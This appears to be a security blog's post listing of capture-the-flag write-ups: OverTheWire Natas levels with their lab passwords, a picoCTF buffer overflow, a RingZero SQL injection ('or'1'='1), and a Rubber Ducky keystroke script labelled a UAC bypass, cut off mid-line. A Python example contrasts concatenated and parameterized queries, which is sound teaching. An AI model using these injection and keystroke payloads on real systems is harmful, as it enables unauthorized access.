Posts

Over the wire Natas Level 3

Objective: Get password for Level 3

Solution:

This page just shows a text box:

    There is nothing on this page

Let's check the source code again:

    There is nothing on this page
    <!-- No more information leaks!! Not even Google will find it this time... -->
    </div>

"Not even Google will find it this time", huh? What do we know that keeps web crawlers from indexing pages? robots.txt. That file is itself readable by anyone, so listing a folder in it tells every visitor where to look. Let's check out the robots.txt and see if there are any goodies in there.

    http://natas3.natas.labs.overthewire.org/robots.txt

    User-agent: *
    Disallow: /s3cr3t/

The Disallow entry for the folder /s3cr3t/ means it doesn't want Google to index that folder. Let's see what is in there:

    http://natas3.natas.labs.overthewire.org/s3cr3t/

Another users.txt file:

    http://natas3.natas.labs.overthewire.org/s3cr3t/users.txt

    natas4:Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ

Over the wire Natas Level 2

Objective: Get password for Level 3

Solution:

This page just shows a text box:

    There is nothing on this page

OK, let's check the source and see if there is anything interesting in there. In the HTML there is an img tag that links to a file named pixel.png in a folder named files:

    There is nothing on this page
    <img src="files/pixel.png">
    </div>
    </body></html>

Let's see if we can see what else is in that folder:

    http://natas2.natas.labs.overthewire.org/files/

There is a txt file in there named users.txt. Let's check it out:

    # username:password
    alice:BYNdCesZqW
    bob:jw2ueICLvT
    charlie:G5vCxkVV3m
    natas3:sJIJNW6ucpu6HPZ1ZAchaDtwd7oGrD14
    eve:zo4mJWyNj2
    mallory:9urtcpzBmH

natas3 password: sJIJNW6ucpu6HPZ1ZAchaDtwd7oGrD14

Over the wire Natas Level 1

Objective: Get password for Level 2

Solution:

This page just shows a text box:

    You can find the password for the next level on this page, but rightclicking has been blocked!

No right clicking... Okay, F11 in Chrome brings up the inspector, so let's use that to get the next password:

    <!--The password for natas2 is ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi -->

Over the wire Natas Level 0

Objective: Get password for Level1

Solution:

This page just shows a text box:

    You can find the password for the next level on this page.

Checking the source code, we find the password for level 1:

    <!--The password for natas1 is gtVrDuiDfck831PqWsLEZy5gyDz1clto -->

PicoCTF 2018 – Binary Exploitation - buffer overflow0

Objective: Let's start off simple, can you overflow the right buffer in this program [1] to get the flag? You can also find it in /problems/buffer-overflow-0_1_316c391426b9319fbdfb523ee15b37db on the shell server. Source [2].

Hints:
(1) How can you trigger the flag to print?
(2) If you try to do the math by hand, maybe try and add a few more characters. Sometimes there are things you aren't expecting.

Solution:

I started by cd-ing over to the problem folder. ls shows us a flag file (which we can't open), the program and the C code. The title tells us this is about a buffer overflow. Running the program we get this:

    ./vuln
    This program takes 1 argument.

OK, let's give it an argument:

    ./vuln 1
    Thanks! Received: 1

Let's try just throwing a bunch of values at it:

    ./vuln 11111111111111111111111111111111111
    picoCTF{ov3rfl0ws_ar3nt_that_bad_3598a894}

that was super simple but

General - Rubber Ducky

So I just got a Rubber Ducky and have been playing around with it. Here is some of my first couple of days.

The first thing I did was import the language in Notepad++ to write my scripts in. You can find the XML file here (https://forums.hak5.org/topic/21045-encoder-duckyscript-notepad-userdefinedlanguage/). I also set a custom console to compile the scripts using the duckencoder.jar:

    CD: C:\users\********\Desktop\Ducky
    Current directory: C:\users\******\Desktop\Ducky
    java -jar duckencoder.jar -i ipconfig -o inject.bin

I also changed the firmware to Twin Duck so I can read/write to the SD card while running a payload: https://forums.hak5.org/topic/28162-firmware-introducing-twin-duck/

For my first little script I borrowed a bit from some other posts, but I'm still not entirely happy with it:

    REM *** UAC Bypass ***
    DELAY 3000
    WINDOWS r
    DELAY 200
    STRING powershell Start-Process cmd.exe -Verb runAs
    ENTER
    DELAY 500
    ALT y
    DELAY 200
    STRING reg add HKCU\So

RingZero – SQLi – Most Basic SQLi pattern

Objective: Login for user/pass

Solution:

So let's try inserting an OR '1'='1':

    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1

OK, it looks like I put too many ' in the injection I tried. Let's leave off the last ':

    'or'1'='1

Got the flag:

    Logged in... GOOD JOB!
    FLAG-238974289383274893
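
Why the extra quote produced a syntax error while the shorter input logged in, and what parameter binding changes, shown as an added example that is not part of the original post. It assumes a string-concatenated login query and uses an in-memory SQLite database in place of the challenge's MySQL server; the table, the credentials and all function names are constructed for illustration.

```python
import sqlite3

def make_db():
    """In-memory stand-in for the challenge's user table (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'correct-horse')")
    return conn

def login_vulnerable(conn, username, password):
    # Input is pasted into the SQL text, so a quote in it ends the string
    # literal and whatever follows is parsed as SQL.
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    return conn.execute(sql).fetchall()

def login_safe(conn, username, password):
    # Placeholders keep the input as data; quotes in it are never parsed.
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchall()

def try_login(fn, conn, username, password):
    """Return 'logged in', 'rejected' or 'sql error' for one attempt."""
    try:
        return "logged in" if fn(conn, username, password) else "rejected"
    except sqlite3.OperationalError:
        return "sql error"

if __name__ == "__main__":
    conn = make_db()
    attempts = [
        # Trailing quote plus the query's own closing quote leaves an
        # unterminated literal, hence the syntax error seen in the post.
        ("extra quote", "'or'1'='1'"),
        # Without it, the query's closing quote completes '1'='1'.
        ("balanced", "'or'1'='1"),
    ]
    for label, pw in attempts:
        print(label,
              "| concatenated:", try_login(login_vulnerable, conn, "x", pw),
              "| parameterized:", try_login(login_safe, conn, "x", pw))
```

With bound parameters both inputs are compared as literal password strings and rejected, and the syntax error disappears because user input never reaches the SQL parser.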